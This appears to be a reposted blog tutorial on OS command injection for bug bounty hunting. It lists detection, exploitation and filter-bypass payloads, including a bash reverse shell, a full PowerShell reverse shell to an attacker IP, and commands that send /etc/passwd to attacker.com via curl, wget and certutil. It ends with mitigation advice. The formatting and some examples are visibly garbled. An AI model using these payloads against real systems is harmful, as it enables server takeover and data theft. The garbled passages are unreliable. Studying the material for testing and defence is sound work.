Listen to this Post
Introduction:
OS command injection remains one of the most dangerous web vulnerabilities, often leading to remote code execution (RCE) and critical-severity bounties. Attackers can inject arbitrary operating system commands through unsanitized user inputs, compromising the entire server. For bug bounty hunters and penetration testers, mastering this flaw—including direct, blind, out-of-band, time-based, and second-order techniques—is essential for maximizing impact and rewards.
Learning Objectives:
- Identify and differentiate between direct, blind, out-of-band, time-based, and second-order OS command injection vectors.
- Execute exploitation techniques using custom payloads, Burp Suite, and command-line tools across Linux and Windows environments.
- Implement mitigation strategies such as input validation, parameterization, and API security hardening.
You Should Know:
1. Understanding OS Command Injection – Core Concepts
OS command injection occurs when an application passes unsafe user-supplied data (e.g., form inputs, headers, cookies) to a system shell. Unlike code injection, this targets the underlying operating system. Common injection points include ping utilities, file converters, log viewers, and API endpoints that execute system commands.
How it works: An application might run `ping user_input` without sanitization. An attacker enters `8.8.8.8; whoami` – the semicolon terminates the intended command and executes whoami. On Windows, `&` or `|` achieves similar results.
Example vulnerable code (PHP):
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);
2. Detection Techniques – Manual and Automated
Before exploiting, confirm injection points using safe, observable payloads.
Step-by-step detection guide:
- Identify all input fields, parameters, and HTTP headers (User-Agent, X-Forwarded-For, Referer).
- Inject simple time-based payloads: `sleep 5` (Linux) or `timeout 5` (Windows). Observe response delay.
- Use arithmetic operations: `| echo $((142))` – if response shows
28, injection works. - For blind detection, trigger DNS lookups: `nslookup test.collaborator.com` (Linux) or `ping -n 1 test.collaborator.com` (Windows).
Linux detection commands:
; sleep 5 | ping -c 1 attacker-server.com $(whoami) `id`
Windows detection commands:
& timeout 5 | ping -n 1 attacker-server.com %COMPUTERNAME%
Automated scanning with ffuf:
ffuf -u "https://target.com/ping?ip=FUZZ" -w payloads.txt -fs 1234
3. Direct (In-band) Exploitation – Step-by-Step
When command output returns in the HTTP response, direct exploitation yields immediate RCE.
Step-by-step guide for direct injection:
- Find a parameter reflecting output (e.g., ping result, file read). Inject `; id` (Linux) or `& whoami` (Windows).
- Enumerate system: `; uname -a` (Linux) or `& systeminfo` (Windows).
- Read sensitive files (Linux): `; cat /etc/passwd` → try `cat /etc/passwd | base64` to avoid filtering.
4. Read sensitive files (Windows): `& type C:\Windows\win.ini`.
5. Establish reverse shell:
- Linux: `; bash -i >& /dev/tcp/attacker-ip/4444 0>&1`
– Windows PowerShell: `& powershell -c “$client=New-Object System.Net.Sockets.TCPClient(‘attacker-ip’,4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2=$sendback + ‘PS ‘+(pwd).Path+’> ‘;$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”`
Payload variations to bypass filters:
- Whitespace bypass: `${IFS}` (Linux) or `%20` → `cat${IFS}/etc/passwd`
– Command substitution: `$(command)` or`command` - Encoding: `echo -n ‘cat /etc/passwd’ | base64` → `| echo ‘Y2F0IC9ldGMvcGFzc3dk’ | base64 -d | bash`
- Blind OS Command Injection – Time-Based and Out-of-Band (OAST)
When no output returns, use time delays or external interactions.
Time-based detection:
; sleep 10 | ping -c 10 127.0.0.1 $(sleep 10)
Step-by-step out-of-band exploitation:
1. Set up Burp Collaborator or Interactsh (`interactsh-client`).
- Inject DNS lookup: `; nslookup unique-id.burpcollaborator.net` (Linux) or `& ping -n 1 unique-id.burpcollaborator.net` (Windows).
- If a DNS hit appears, confirm injection. Then exfiltrate data:
– Linux: ; cat /etc/passwd | base64 | curl -d @- http://attacker.com/exfil`& certutil -urlcache -f http://attacker.com/exfil?data=%COMPUTERNAME%`
- Windows:
4. Use `curl` or `wget` for HTTP exfiltration: `; wget –post-file=/etc/passwd attacker.com/upload`
Blind command execution with time-based payloads (MySQL + command injection):
' OR sleep(10) AND '1'='1
5. Second-Order Command Injection
In second-order injection, the payload is stored (e.g., in database, file, or log) and executed later when another function calls the system command.
Example scenario: An application stores a username like `admin$(id)` during registration. When an admin later runs a system script to email users, the command executes.
Step-by-step testing:
- Submit payload in a stored field: `test”; curl http://attacker.com/ –data @/etc/passwd `
2. Trigger the secondary function (e.g., export report, generate backup, send notification).
3. Monitor out-of-band interactions.
Mitigation for developers: Never use user input directly in system calls. Always validate against an allowlist.
- Mitigation and Secure Coding – Commands for Hardening
Prevention is better than bounty hunting. Here are hardening commands for Linux and Windows.
Linux – Restrict shell access and sanitize:
Use PHP's escapeshellarg() or escapeshellcmd() Use Python's subprocess with list arguments (no shell=True) subprocess.run(["ping", "-c", "4", user_input]) Safe Disable dangerous functions in php.ini disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source Set restrictive AppArmor or SELinux policies sudo aa-enforce /usr/bin/vulnerable-app
Windows – PowerShell security:
Constrained Language Mode $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage" Disable wscript and cscript Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Scripting" Use Application Control (WDAC) New-CIPolicy -FilePath policy.xml -UserPEs
API security (REST/GraphQL): Validate input against an allowlist of expected values (e.g., ["8.8.8.8", "1.1.1.1"]) instead of blocking characters.
Cloud hardening (AWS Lambda / Azure Functions): Run functions with least privilege IAM roles, disable shell access, and use managed runtimes.
7. Advanced Automation and Tooling
Speed up bug bounty workflows with custom scripts and wordlists.
Payload generation script (Python):
payloads = []
for cmd in ['id', 'whoami', 'uname -a', 'cat /etc/passwd']:
for separator in [';', '|', '&', '$()', '`', '||', '&&']:
payloads.append(f"{separator} {cmd}")
print("\n".join(payloads))
Using ffuf with blind payloads:
ffuf -u "https://target.com/archive?file=FUZZ" -w blind_payloads.txt -H "User-Agent: \$(nslookup test.burpcollaborator.net)" -ac
Burp Suite extensions: Use “Command Injection Attacker” or “Collaborator Everywhere” for automated OAST detection.
Windows batch script for fuzzing:
@echo off for /f "tokens=" %%a in (payloads.txt) do ( curl -s "https://target.com/ping?ip=8.8.8.8%%a" --output nul timeout /t 1 )
What Undercode Say:
- Key Takeaway 1: OS command injection remains a critical vulnerability because developers still use unsafe system calls. Mastering detection across direct, blind, and second-order vectors separates novice bug hunters from top earners.
- Key Takeaway 2: Modern exploitation relies on out-of-band techniques (DNS/HTTP exfiltration) to bypass firewalls and WAFs. Combining time-based delays with OAST tools like Interactsh increases success rates in blind scenarios.
Analysis: The YesWeHack guide highlights a persistent truth: legacy codebases and rapid development cycles repeatedly introduce command injection flaws. From IoT devices to cloud APIs, any application that executes shell commands without strict allowlisting is vulnerable. Bug bounty platforms report average payouts of $3,000–$10,000 for RCE via command injection, with critical bounties exceeding $25,000. However, mitigation is straightforward—use parameterized APIs, avoid `system()` and `exec()` with user input, and implement input allowlists. For defenders, regular static analysis (e.g., grep -r "system(" --include=".php") and dynamic scanning with custom payloads are non-negotiable. As AI-generated code becomes common, injection flaws may increase unless security is embedded in training data. The future belongs to automated discovery tools paired with human creativity in chaining injections into full compromise.
Prediction:
Within two years, OS command injection will shift from manual exploitation to fully automated AI-powered detection, with large language models generating context-aware payloads in real time. However, defenders will counter with runtime application self-protection (RASP) and eBPF-based syscall filtering. Bug bounty hunters must adapt by focusing on business logic–based command injection (e.g., second-order via log files) and edge systems like embedded devices and OT networks, where traditional mitigations are often absent. The highest bounties will come from chaining command injection with privilege escalation or cloud metadata APIs, leading to full environment takeover.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: The Ultimate – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
